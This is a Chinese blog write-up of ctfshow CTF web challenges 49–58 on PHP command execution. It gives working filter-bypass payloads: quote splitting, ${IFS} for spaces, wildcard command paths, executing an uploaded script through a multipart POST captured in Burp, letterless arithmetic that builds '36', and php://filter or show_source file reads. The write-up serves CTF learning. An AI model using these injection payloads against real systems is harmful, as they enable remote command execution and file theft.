ctfshow学习记录-web入门(命令执行49-58)

已于 2022-08-11 11:49:10 修改
阅读量912 收藏
点赞数
分类专栏: ctf-web # ctfshow-web 文章标签: 学习 php web安全
于 2022-06-07 16:30:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_48780534/article/details/125095363
版权

目录

web49

解答: 过滤的内容依旧只是命令的字符串,过滤了$所以不能拼接,*不能使用通配符,过滤了%不能用换行%0a之类的过滤。

web46的第二个payload可以使用。
nl<fla''g.php||

web50

解答:新增过滤了x09和x26,是tab键和&,tab可以代替空格,&是连接符。

上题payload继续可用。?c=nl<fla''g.php||

web51

解答: 增加了一个命令tac的过滤上题,不影响,上题的payload依旧可用

web52

解答:​ $没过滤,大小于号过滤了,可以用${IFS}绕过空格

?c=nl${IFS}/fla''g||(flag没有放在flag.php中,而是根目录下的/flag中)

或者nl$IFS/fla''g||

web53

解答:​ 增加了一个命令wget的过滤,上题payload可用,?c=nl${IFS}fla''g.php

wget是linux上的命令行的下载工具。

web54

解答: 不能用简单的字符绕过了,而且nl也被过滤了,没有过滤?
可以通过?和完整的命令路径来使用命令。
?c=/bin/?at${IFS}f???????

web55

解答: 过滤了字母和%等信息,之前的异或不能用了。用无字母数字的命令执行。(来源phith0n大佬,个人博客是离别歌)

<!--构造一个post上传文件的数据包,这是个上传页面,选择文件上传-->
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>POST数据包POC</title>
</head>
<body>
<form action="http://f2ef59eb-65f2-45f1-ba08-9e5def4312f5.chall.ctf.show/" method="post" enctype="multipart/form-data">
<!--链接是当前打开的题目链接-->
    <label for="file">文件名:</label>
    <input type="file" name="file" id="file"><br>
    <input type="submit" name="submit" value="提交">
</form>
</body>
</html>

抓包,下附抓包内容。
需要时修改HOST地址为题目地址即可。修改时注意没有http://,最后也没有/结尾,不去掉会出错。
payload:?c=.+/???/????????[@-[]
后面的[@-[]是linux下面的匹配符,是进行匹配的大写字母。

后续我拿我之前做的记录截图,就不再重做了,用的还是以前的burp。
在这里插入图片描述附上burp传递的内容。

POST /?c=.%20/???/????????[@-[] HTTP/1.1
Host: c384457a-592d-4547-adad-4b8552845e94.chall.ctf.show
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------397130793013726083754245254477
Content-Length: 364
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/ctf/web/php/upload.html
Cookie: UM_distinctid=174ba7e36f4893-09d527032ef6bb8-4c3f247a-15f900-174ba7e36f6938
Upgrade-Insecure-Requests: 1

-----------------------------397130793013726083754245254477
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: application/octet-stream


#!/bin/sh
ls
-----------------------------397130793013726083754245254477
Content-Disposition: form-data; name="submit"

鎻愪氦
-----------------------------397130793013726083754245254477--

在这里插入图片描述

web56

解答: 方法同上,host修改一下就可以用。

web57

解答:过滤了字母和数字,题目提示flag在36.php中,所以,我们要构造数字36。

shell中$(( )) 与 ( ) 还有 ( ) 还有 ()还有{ }的区别

${_}:代表上一次命令执行的结果,之前没有命令返回或者执行,结果应该是空,与""等价
$(()): 做运算
$((""))值为0,$((~$((""))))值为-1,---->$(($((~$((""))))$((~$((""))))))结果是(-1-1=-2)

$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~
$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~
$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~
$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~
$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~
$(())))$((~$(())))$((~$(())))))))
#拼接得到-37 , -37取反得到36
    
${_} ="" //返回上一次命令
#也可以payload:
$((~$(($((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))))))

web58

解答:有一些函数被禁用了,具体的不清楚,测试的几个常用的不能用。注意是post传递,不是get

可以使用伪协议:c=include "php://filter/read=convert.base64-encode/resource=flag.php";

或者:c=show_source('flag.php');

九枕
关注
专栏目录
ctfshow-Web入门-58~74wp
yutianovo的博客
09-24 1122
Web58-65 POST c=include($_GET['url']); GET /?url=php://filter/read=convert.base64-encode/resource=flag.php Web66-70 flag 换位置了 /flag.txt Payload还可以用 Web71 import requests url = "http://c5e8824e-b5b4-4842-8d39-bbcb78eb7976.chall.ctf.show/" d = {'c': 'i
ctfshow web入门 命令执行web29-web57详解
2401_84009549的博客
04-20 868
当print_r(scandir(pos(localeconv())));时,会返回当前目录,pos(localeconv())的值为"."将数组用array_reverse进行倒转,并用next将指针指向flag.php最后进行读取,列出两个整理起来就是。
CTFshow 命令执行 web47
Kradress的博客
11-20 186
目录源码知识点题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-05 21:59:23 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['c'])){
CTFshow web入门 web57------- web77命令执行wp
最新发布
2202_75289892的博客
08-06 295
过滤了数字字母以及一些符号,输入参数c,题目提示了flag在36.php,由于输入参数后添加了cat c.php,只需要输入36即可,但数字被过滤。$((~ $(())))=-1 对其取反。因此可以37个 -1相加,再取反。
ctfshow-web49(命令执行)
m0_62094846的博客
01-26 182
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-05 22:22:43 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['c'])){ $c=$_GET['c'];..
CTFshow web入门58-65
li_n_k的博客
11-13 186
CTFshow web入门58-65
ctfshow web58
m0_69289738的博客
09-18 116
结果phpinfo被禁用了,那我们就查看不了被禁用的函数了。尝试读取文件,flag.php,发现可以查看源代码得答案。打算先使用PHPinfo看看禁用了哪些函数。尝试system("ls");
ctfshow web40-web60系统命令执行 wp
qq_56158055的博客
01-13 490
事先声明,本文只用来学习交流,不参与以任何商业形式的活动。本文不会出现flag。 web40 源码 发现过滤了所有数字,以及大部分的字符,但仔细观察可以发现,括号是中文的括号,因此我们可以利用这点,来进行无参RCE 可以利用p神的无参数RCE来做,利用localeconv()函数来做,也可以用异或和取反来做。 我这边用的是get_defined_vars()函数。 get_defined_vars():返回由所有已定义变量所组成的数组 因此我们可以 发现一堆乱七八糟的 利用
[ctfshow]web入门——命令执行web72-web77)
ShenZ的博客
12-02 2456
ctfshow的命令执行(web72-77)
[ctfshow]web入门——命令执行web54-web71)
ShenZ的博客
12-01 4335
文章目录web54 web54
ctfshow-web入门——命令执行(3)(web58-web71)
m0_62905745的博客
03-16 391
本篇文章是ctfshow的web入门部分的命令执行部分wp(web58-web 71),包括一些题目解答,自己的笔记和总结,有错误还希望大家指正,一起学习进步!
ctfshow web入门58-77绕过disable function
羽的博客
09-17 2362
该系列为php中绕过disable function的题目 下文中写的过xxx(65之前的)表示此题及此题之前的都可以过 通过复制,重命名读取php文件内容(函数执行后,访问url/flag.txt) 函数: copy() rename() 用法: copy("flag.php","flag.txt"); //过60 rename("flag.php","flag.txt"); //过60 单一函数读文件内容: 函数: file_get_contents() r
ctfshow web入门 命令执行58-71
rawrecruit的博客
04-05 3566
ctfshow web入门 命令执行篇的个人刷题记录
CTFshow 命令执行 web58
Kradress的博客
12-03 560
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-07 22:02:47 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ // 你们在炫技吗? if(isset($_POST
命令执行(2)ctfshow_web入门命令执行web39-49
weixin_47726676的博客
04-25 362
web39 error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ include($c.".php"); } }else{ highlight_file(__FILE__); } 没有回响,并且加了php的后缀,38的解法还是可以使用 ?c=data://text/plain,<?=system("tac
ctfshow web入门命令执行web49-web53
m0_62207170的博客
03-31 270
ctfshow web入门命令执行web49-web53
Ctfshow web入门-web46
qq_45427131的博客
05-18 409
web46 查看源码,preg_match的过滤又增加了空格和$ 本来我们对于空格的绕过是${IFS}和%0a,不过preg_match过滤了美元符,用%09也可以绕过preg_match的过滤, 虽然对获取到的值有preg_match的过滤,但是preg_match不能过滤这种没有空格的命令,譬如ls,dir,whoami等等,首先执行,查看当前目录底下有哪些文件 构造payload: ?c=ls&&ls (&记得编码) 成功rce,接下来就是·获取flag,因为源码过滤
刷题之旅第20站,CTFshow misc49
cc菜的一批
02-15 1390
感谢ctf show平台提供题目 下载文件打开后,发现熟悉的文件结构,一看就是zip文件。 修改后缀名为zip,解压看到hint.txt 发现字母变化范围不大,且尾部有== 字母解密得到: 音符解密: 花朵解密: 得到压缩包密码:key{welcome_to_ctf} 解压后是俩张一样的图片 使用盲水印工具,解密,得到flag。 原创文章不易,点个赞再走吧。 ...
ctfshow web入门 命令执行web54-58
m0_62207170的博客
04-03 667
ctfshow web入门 命令执行web54-58
ctfshow-web-web红包题
07-14
ctfshow-web-web红包题是一道CTF比赛中的网络安全题目。这道题目的背景是一个在线购物网站,要求我们通过安全漏洞来获得网站的红包。 首先,我们可以检查网站的源代码,寻找可能存在的漏洞。在网站的前端页面中,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值